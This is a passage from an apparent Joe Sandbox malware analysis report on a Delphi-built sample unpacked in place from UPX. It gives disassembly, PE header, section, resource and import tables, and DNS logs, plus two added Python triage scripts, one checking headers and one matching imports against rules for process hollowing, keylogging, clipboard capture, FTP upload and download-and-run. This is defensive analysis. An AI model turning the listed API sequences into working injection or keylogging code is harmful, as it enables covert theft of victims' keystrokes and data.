                mov eax, dword ptr [1000E134h]
                mov byte ptr [eax], 00000001h
                push 00008007h
                call 00007FB3BCC18A76h
                lea edx, dword ptr [ebp-14h]
                mov eax, 00000001h
                call 00007FB3BCC1949Dh
                mov eax, dword ptr [ebp-14h]
                mov edx, 1000D76Ch
                call 00007FB3BCC17570h
                jne 00007FB3BCC20CCDh
                lea edx, dword ptr [ebp-18h]
                xor eax, eax
                call 00007FB3BCC19484h
                mov edx, dword ptr [ebp-18h]
                mov eax, 10012580h
                call 00007FB3BCC172CFh
                push 00000000h
                push 00000000h
                push 00000000h
                mov eax, dword ptr [10012580h]
                call 00007FB3BCC1741Fh
                push eax
                push 1000D77Ch
                push 00000000h
                call 00007FB3BCC1F1FEh
                push 00000000h
                call 00007FB3BCC18937h
                lea edx, dword ptr [ebp-1Ch]
                mov eax, 00000001h
                call 00007FB3BCC19446h
                mov eax, dword ptr [ebp-1Ch]
                mov edx, 1000D78Ch
                call 00007FB3BCC17519h
                jne 00007FB3BCC20C9Ch
                push 00001770h
                call 00007FB3BCC18A31h

                Data Directories

                Name                                  Virtual Address  Virtual Size  Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IMPORT          0x58000          0x154         .imports
                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x56000          0x15e8        .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_TLS             0x55670          0x18          UPX1
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                Sections

                Name      Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                UPX0      0x1000           0x44000       0x43400   False     0.106151254647   data       1.70105807457  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                UPX1      0x45000          0x11000       0x10800   False     0.6171875        data       6.08119940627  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc     0x56000          0x2000        0x1a00    False     0.319411057692   data       4.08638397556  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .imports  0x58000          0x1000        0xe00     False     0.346261160714   data       4.37091582011  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
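Three header facts in the tables above deserve a second look before the "UPX" section names are taken at face value: the COFF time stamp 0x2A425E19 is the constant that Delphi linkers write into every binary (it dates the compiler family, not the build), the UPX0 section has a non-zero raw size and contains the entry point (while a file is still UPX-packed, UPX0 has raw size 0 and the entry point sits in the UPX1 stub, so this image was unpacked in place), and both code sections are writable as well as executable. The script below is an added example, not part of the Joe Sandbox report: it assembles a synthetic PE header from the values listed above (constructed data, no file on disk is read) and runs those checks with a small hand-written header parser, plus a second synthetic header laid out the way UPX leaves a still-packed file so both branches are exercised.

```python
"""Header-level PE triage: Delphi fixed timestamp, UPX packed vs. unpacked in place, RWX sections.

Added example written against the values in this report; the header bytes are
constructed in memory, not read from the sample.
"""
import struct
from datetime import datetime, timezone

DELPHI_FIXED_TIMESTAMP = 0x2A425E19   # 1992-06-19 22:22:17 UTC, written by Delphi linkers
IMAGE_FILE_DLL = 0x2000
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
_COFF_FMT = "<HHIIIHH"          # 20-byte IMAGE_FILE_HEADER
_SECTION_FMT = "<8sIIIIIIHHI"   # 40-byte IMAGE_SECTION_HEADER


def build_synthetic_header(sections, entry_rva, image_base, timestamp, characteristics):
    """Constructed test data: DOS stub, PE signature, COFF header, PE32 optional header, section table.
    sections = [(name, virtual_address, virtual_size, raw_size, characteristics), ...]"""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt = bytearray(0xE0)                          # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)          # Magic
    struct.pack_into("<I", opt, 16, entry_rva)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)    # ImageBase
    coff = struct.pack(_COFF_FMT, 0x14C, len(sections), timestamp, 0, 0, len(opt), characteristics)
    table = b"".join(struct.pack(_SECTION_FMT, n.encode().ljust(8, b"\x00"), vs, va, raw, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, raw, ch in sections)
    return dos + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_header(data):
    """Read only the fields the triage needs (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from(_COFF_FMT, data, coff_off)
    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", data, opt_off)[0]
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]
    if magic == 0x10B:                                            # PE32
        image_base = struct.unpack_from("<I", data, opt_off + 28)[0]
    elif magic == 0x20B:                                          # PE32+
        image_base = struct.unpack_from("<Q", data, opt_off + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, _p, _r, _l, _nr, _nl, schars = struct.unpack_from(
            _SECTION_FMT, data, opt_off + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw": raw, "chars": schars})
    return {"timestamp": ts, "entry": entry, "image_base": image_base,
            "characteristics": chars, "sections": sections}


def timestamp_utc(ts):
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def triage(hdr):
    findings = []
    if hdr["timestamp"] == DELPHI_FIXED_TIMESTAMP:
        findings.append("delphi_fixed_timestamp")
    if not hdr["characteristics"] & IMAGE_FILE_DLL and hdr["image_base"] != 0x400000:
        findings.append("nonstandard_exe_image_base:0x%x" % hdr["image_base"])
    secs = {s["name"]: s for s in hdr["sections"]}
    entry_sec = next((s["name"] for s in hdr["sections"]
                      if s["va"] <= hdr["entry"] < s["va"] + s["vsize"]), None)
    if "UPX0" in secs and "UPX1" in secs:
        if secs["UPX0"]["raw"] == 0 and entry_sec == "UPX1":
            findings.append("upx_packed")                 # stub still has to unpack UPX0 at run time
        elif secs["UPX0"]["raw"] > 0 and entry_sec == "UPX0":
            findings.append("upx_unpacked_in_place")      # section names kept, code already in place
    for s in hdr["sections"]:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("rwx_section:" + s["name"])
    return findings


# Values copied from this report's section table: (name, VA, VirtualSize, RawSize, Characteristics).
REPORT_SECTIONS = [
    ("UPX0", 0x1000, 0x44000, 0x43400, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    ("UPX1", 0x45000, 0x11000, 0x10800, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    (".rsrc", 0x56000, 0x2000, 0x1A00, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    (".imports", 0x58000, 0x1000, 0xE00, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
]
REPORT_CHARACTERISTICS = 0x838F   # the eight IMAGE_FILE_* flags listed in the report
SAMPLE_HEADER = build_synthetic_header(REPORT_SECTIONS, 0x1000D0F4 - 0x10000000, 0x10000000,
                                       DELPHI_FIXED_TIMESTAMP, REPORT_CHARACTERISTICS)
# Constructed counterpart laid out like a file UPX has not yet unpacked: UPX0 raw size 0, entry in UPX1.
PACKED_HEADER = build_synthetic_header(
    [("UPX0", 0x1000, 0x44000, 0, REPORT_SECTIONS[0][4]), ("UPX1", 0x45000, 0x11000, 0x10800, REPORT_SECTIONS[1][4])],
    0x55000, 0x10000000, DELPHI_FIXED_TIMESTAMP, REPORT_CHARACTERISTICS)

if __name__ == "__main__":
    hdr = parse_header(SAMPLE_HEADER)
    print("TimeDateStamp:", timestamp_utc(hdr["timestamp"]))
    for finding in triage(hdr):
        print("finding:", finding)
```

On a real file, pass the first few kilobytes of the sample to parse_header(); the same checks apply unchanged to PE32+ images. The Delphi constant explains why the build date should not be used for timelining this family, and the unpacked-in-place layout is why the entry-point disassembly further down shows an ordinary Delphi prologue rather than a UPX decompression stub.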

                Resources

                Name           RVA      Size    Type                  Language  Country
                RT_ICON        0x48374  0x128   GLS_BINARY_LSB_FIRST
                RT_ICON        0x4849c  0x568   GLS_BINARY_LSB_FIRST
                RT_ICON        0x48a04  0x2e8   data
                RT_ICON        0x48cec  0x8a8   data
                RT_ICON        0x56378  0x128   GLS_BINARY_LSB_FIRST
                RT_ICON        0x564a4  0x568   GLS_BINARY_LSB_FIRST
                RT_ICON        0x56a10  0x2e8   data
                RT_ICON        0x56cfc  0x8a8   data
                RT_RCDATA      0x4a7b4  0x10    data
                RT_RCDATA      0x4a7c4  0x108   data
                RT_RCDATA      0x4a8cc  0x1390  data
                RT_RCDATA      0x4bc5c  0x7850  data
                RT_GROUP_ICON  0x575a8  0x3e    data
                RT_GROUP_ICON  0x534ec  0x3e    data

                Imports

                DLL: Imports
                KERNEL32.DLL: DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                user32.dll: GetKeyboardType, MessageBoxA
                advapi32.dll: RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                oleaut32.dll: SysFreeString, SysReAllocStringLen, SysAllocStringLen
                KERNEL32.DLL: TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                advapi32.dll: RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyW, RegCloseKey
                KERNEL32.DLL: lstrlenW, WriteProcessMemory, WriteFile, WaitForSingleObject, VirtualProtectEx, VirtualFreeEx, VirtualFree, VirtualAllocEx, VirtualAlloc, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetThreadPriority, SetThreadContext, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ReadProcessMemory, ReadFile, LockResource, LoadResource, LoadLibraryA, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GetWindowsDirectoryW, GetThreadContext, GetTempPathW, GetSystemDirectoryW, GetModuleHandleA, GetModuleFileNameW, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesW, GetCommandLineW, FreeResource, InterlockedIncrement, InterlockedDecrement, FindResourceW, FindFirstFileW, FindClose, ExitProcess, DeleteFileW, DeleteCriticalSection, CreateThread, CreateRemoteThread, CreateProcessW, CreateMutexW, CreateFileW, CreateEventA, CreateDirectoryW, CopyFileW, CloseHandle
                user32.dll: CreateWindowExW, CreateWindowExA, UnregisterClassW, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, ShowWindow, SetWindowsHookExW, SetWindowLongA, SetClipboardViewer, SendMessageA, RegisterWindowMessageW, RegisterClassW, RegisterClassA, PostMessageA, PeekMessageA, OpenClipboard, MapVirtualKeyW, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowLongA, GetMessageA, GetKeyboardLayout, GetKeyState, GetForegroundWindow, GetDesktopWindow, GetClipboardData, GetClassInfoA, DispatchMessageA, DestroyWindow, DefWindowProcA, CloseClipboard, CharUpperW, CharNextW, CharLowerW, CallNextHookEx
                shlwapi.dll: SHDeleteKeyW
                shell32.dll: SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetMalloc, FindExecutableW
                URLMON.DLL: URLDownloadToCacheFileW
                wininet.dll: InternetCloseHandle, FtpPutFileW, FtpSetCurrentDirectoryW, InternetOpenW, InternetConnectW
                user32.dll: GetKeyboardState, ToUnicodeEx
                shell32.dll: ShellExecuteW
                ntdll.dll: NtUnmapViewOfSection
                shlwapi.dll: SHDeleteValueW, SHDeleteKeyW
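The import table above is worth reading as capability clusters rather than as a flat list: CreateProcessW, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread together are the process-hollowing sequence; SetWindowsHookExW, CallNextHookEx, GetKeyboardState and ToUnicodeEx are a keyboard hook that converts virtual keys to text; OpenClipboard, GetClipboardData and SetClipboardViewer capture the clipboard; InternetConnectW with FtpPutFileW is an FTP upload path; URLDownloadToCacheFileW with ShellExecuteW is download-and-run. The repeated descriptors for KERNEL32.DLL, user32.dll, advapi32.dll, shell32.dll and shlwapi.dll are also informative: Delphi emits one descriptor per unit that declares an external, so their count survives the in-place unpacking. The script below is an added example, not part of the Joe Sandbox report. It takes the rows exactly as the report renders them (DLL name fused to its API list), splits them on the ".dll" boundary, merges repeated descriptors, and applies all-of/any-of rules whose names and API sets are this example's own choices, not a standard taxonomy. A deliberately unmatched winsock_c2 rule is included as the negative case: no ws2_32 imports are listed here, but LoadLibraryA is, so a static import table is only a lower bound on what the code calls at run time.

```python
"""Capability triage from a flattened import table (added example, not report code)."""
import re
from collections import Counter

# Constructed input: the report's 'DLL / Import' rows, verbatim, in their fused rendering.
REPORT_IMPORTS = """\
KERNEL32.DLLDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dllGetKeyboardType, MessageBoxA
advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
KERNEL32.DLLTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dllRegSetValueExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyW, RegCloseKey
KERNEL32.DLLlstrlenW, WriteProcessMemory, WriteFile, WaitForSingleObject, VirtualProtectEx, VirtualFreeEx, VirtualFree, VirtualAllocEx, VirtualAlloc, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetThreadPriority, SetThreadContext, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ReadProcessMemory, ReadFile, LockResource, LoadResource, LoadLibraryA, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GetWindowsDirectoryW, GetThreadContext, GetTempPathW, GetSystemDirectoryW, GetModuleHandleA, GetModuleFileNameW, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesW, GetCommandLineW, FreeResource, InterlockedIncrement, InterlockedDecrement, FindResourceW, FindFirstFileW, FindClose, ExitProcess, DeleteFileW, DeleteCriticalSection, CreateThread, CreateRemoteThread, CreateProcessW, CreateMutexW, CreateFileW, CreateEventA, CreateDirectoryW, CopyFileW, CloseHandle
user32.dllCreateWindowExW, CreateWindowExA, UnregisterClassW, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, ShowWindow, SetWindowsHookExW, SetWindowLongA, SetClipboardViewer, SendMessageA, RegisterWindowMessageW, RegisterClassW, RegisterClassA, PostMessageA, PeekMessageA, OpenClipboard, MapVirtualKeyW, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowLongA, GetMessageA, GetKeyboardLayout, GetKeyState, GetForegroundWindow, GetDesktopWindow, GetClipboardData, GetClassInfoA, DispatchMessageA, DestroyWindow, DefWindowProcA, CloseClipboard, CharUpperW, CharNextW, CharLowerW, CallNextHookEx
shlwapi.dllSHDeleteKeyW
shell32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetMalloc, FindExecutableW
URLMON.DLLURLDownloadToCacheFileW
wininet.dllInternetCloseHandle, FtpPutFileW, FtpSetCurrentDirectoryW, InternetOpenW, InternetConnectW
user32.dllGetKeyboardState, ToUnicodeEx
shell32.dllShellExecuteW
ntdll.dllNtUnmapViewOfSection
shlwapi.dllSHDeleteValueW, SHDeleteKeyW
"""

# Rule names and API sets are this example's own; "all" must be fully present, at least one "any" if given.
CAPABILITY_RULES = {
    "process_hollowing": {"all": {"CreateProcessW", "VirtualAllocEx", "WriteProcessMemory", "SetThreadContext", "ResumeThread"},
                          "any": {"NtUnmapViewOfSection", "GetThreadContext"}},
    "remote_thread_injection": {"all": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}},
    "windows_hook_keylogger": {"all": {"SetWindowsHookExW", "CallNextHookEx"},
                               "any": {"ToUnicodeEx", "GetKeyboardState", "GetKeyState", "MapVirtualKeyW"}},
    "clipboard_capture": {"all": {"OpenClipboard", "GetClipboardData"}, "any": {"SetClipboardViewer"}},
    "ftp_upload": {"all": {"InternetConnectW", "FtpPutFileW"}},
    "download_and_run": {"all": {"URLDownloadToCacheFileW"}, "any": {"ShellExecuteW", "CreateProcessW"}},
    "registry_value_write": {"all": {"RegCreateKeyW", "RegSetValueExW"}},
    "winsock_c2": {"all": {"WSAStartup", "connect", "send", "recv"}},   # negative case for this table
}

_ROW = re.compile(r"^(?P<dll>\S+?\.dll)\s*(?P<apis>.*)$", re.IGNORECASE)


def parse_import_rows(rows):
    """Split fused 'name.dllApi1, Api2' rows; return (descriptor count per DLL, APIs per DLL)."""
    descriptors = Counter()
    imports = {}
    for row in rows:
        row = row.strip()
        if not row:
            continue
        m = _ROW.match(row)
        if not m:
            raise ValueError("unrecognised import row: %r" % row)
        dll = m.group("dll").lower()
        descriptors[dll] += 1
        imports.setdefault(dll, set()).update(a.strip() for a in m.group("apis").split(",") if a.strip())
    return descriptors, imports


def all_imported_apis(imports):
    return set().union(*imports.values())


def match_capabilities(apis):
    """Return {rule: sorted evidence APIs} for every rule satisfied by the import set."""
    hits = {}
    for name, rule in CAPABILITY_RULES.items():
        if not rule["all"] <= apis:
            continue
        any_hit = rule.get("any", set()) & apis
        if rule.get("any") and not any_hit:
            continue
        hits[name] = sorted(rule["all"] | any_hit)
    return hits


if __name__ == "__main__":
    descriptors, imports = parse_import_rows(REPORT_IMPORTS.splitlines())
    for dll, n in sorted(descriptors.items()):
        print(f"{dll}: {n} descriptor(s), {len(imports[dll])} distinct imports")
    for cap, evidence in match_capabilities(all_imported_apis(imports)).items():
        print(cap, "<-", ", ".join(evidence))
```

The rules match the same API groups that are listed in the report, so the output is evidence for, not proof of, each behaviour: a hollowing rule firing on imports says the code can hollow a process, while the svchost.exe memory dumps further down in this report are what show that it did.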

                Network Behavior

                Network Port Distribution

                UDP Packets

                Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                Sep 30, 2021 16:43:20.096625090 CEST  57875        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:20.141801119 CEST  53           57875      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:23.020596981 CEST  54154        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:23.043181896 CEST  53           54154      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:27.934091091 CEST  52806        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:27.947838068 CEST  53           52806      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:38.074309111 CEST  53910        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:38.096344948 CEST  53           53910      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:42.170567989 CEST  64021        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:42.191853046 CEST  53           64021      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:44.799498081 CEST  60784        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:44.813308954 CEST  53           60784      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:45.749758005 CEST  51143        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:45.764856100 CEST  53           51143      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:48.858751059 CEST  56009        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:48.892848969 CEST  53           56009      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:49.304711103 CEST  59026        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:49.327239990 CEST  53           59026      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:52.914905071 CEST  49572        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:52.927978992 CEST  53           49572      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:43:56.480106115 CEST  60823        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:43:56.503549099 CEST  53           60823      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:00.041601896 CEST  52130        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:00.088879108 CEST  53           52130      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:03.747132063 CEST  55102        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:03.760642052 CEST  53           55102      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:06.467978001 CEST  56236        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:06.495043993 CEST  53           56236      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:07.293972015 CEST  56527        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:07.307854891 CEST  53           56527      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:11.084230900 CEST  49559        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:11.098330021 CEST  53           49559      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:12.881702900 CEST  52650        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:12.902245998 CEST  53           52650      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:13.519047976 CEST  63297        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:13.571347952 CEST  53           63297      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:14.197781086 CEST  58361        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:14.212165117 CEST  53           58361      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:14.697310925 CEST  53615        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:14.717567921 CEST  53           53615      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:14.909430027 CEST  50728        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:14.923413992 CEST  53           50728      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:15.071384907 CEST  53777        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:15.098577023 CEST  53           53777      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:15.310091019 CEST  57106        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:15.381442070 CEST  53           57106      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:15.822326899 CEST  60352        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:15.835849047 CEST  53           60352      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:16.157025099 CEST  56773        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:16.169327021 CEST  53           56773      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:16.260858059 CEST  60982        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:16.274626970 CEST  53           60982      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:16.778482914 CEST  58058        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:16.791419029 CEST  53           58058      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:17.714875937 CEST  64367        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:17.822870970 CEST  53           64367      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:18.245699883 CEST  51539        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:18.258774042 CEST  53           51539      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:18.793023109 CEST  55393        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:18.823874950 CEST  53           55393      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:18.930058956 CEST  50585        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:19.015294075 CEST  53           50585      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:20.109635115 CEST  63456        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:20.123543978 CEST  53           63456      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:22.152010918 CEST  58540        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:22.165651083 CEST  53           58540      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:24.775824070 CEST  55108        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:24.797271967 CEST  53           55108      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:25.784673929 CEST  58942        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:25.798405886 CEST  53           58942      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:27.651890993 CEST  64432        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:27.666898966 CEST  53           64432      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:29.328229904 CEST  49250        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:29.341336966 CEST  53           49250      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:32.872898102 CEST  63490        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:32.887037039 CEST  53           63490      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:34.393351078 CEST  65110        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:34.408071995 CEST  53           65110      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:36.526617050 CEST  61120        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:36.541001081 CEST  53           61120      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:40.077255011 CEST  53079        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:40.098599911 CEST  53           53079      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:43.693994999 CEST  50824        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:43.710228920 CEST  53           50824      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:43.996954918 CEST  56706        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:44.010612965 CEST  53           56706      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:47.248116970 CEST  53569        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:47.261413097 CEST  53           53569      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:50.792040110 CEST  62855        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:50.806456089 CEST  53           62855      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:54.339596987 CEST  51046        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:54.353445053 CEST  53           51046      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:54.513010979 CEST  65501        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:54.539092064 CEST  53           65501      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:55.530015945 CEST  53465        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:55.544368982 CEST  53           53465      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:44:57.888556004 CEST  49290        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:58.971708059 CEST  49290        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:44:58.984798908 CEST  53           49290      8.8.8.8      192.168.2.3
                Sep 30, 2021 16:45:02.654875040 CEST  59754        53         192.168.2.3  8.8.8.8
                Sep 30, 2021 16:45:02.669064045 CEST  53           59754      8.8.8.8      192.168.2.3
